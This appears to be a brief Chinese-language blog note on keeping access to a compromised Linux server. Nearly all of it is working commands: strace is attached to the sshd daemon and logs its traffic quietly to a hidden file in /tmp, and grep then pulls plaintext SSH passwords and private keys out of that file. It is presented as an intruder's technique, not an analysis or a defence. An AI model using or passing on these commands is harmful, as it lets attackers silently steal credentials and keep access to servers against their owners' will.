【笔记】Linux通过记录日志的方式实现权限维持
前言
Linux通过记录日志的方式实现权限维持
记录sshd日志中的明文密码
1 | strace -f -F -p `ps aux | grep "sshd -D" | grep -v grep | awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log & |
查看
1 | grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log |
记录sshd日志中的明文密钥
1 | strace -f -F -p `ps aux | grep "sshd -D" | grep -v grep | awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log & |
查看
1 | grep 'PRIVATE KEY' /tmp/.sshd.log |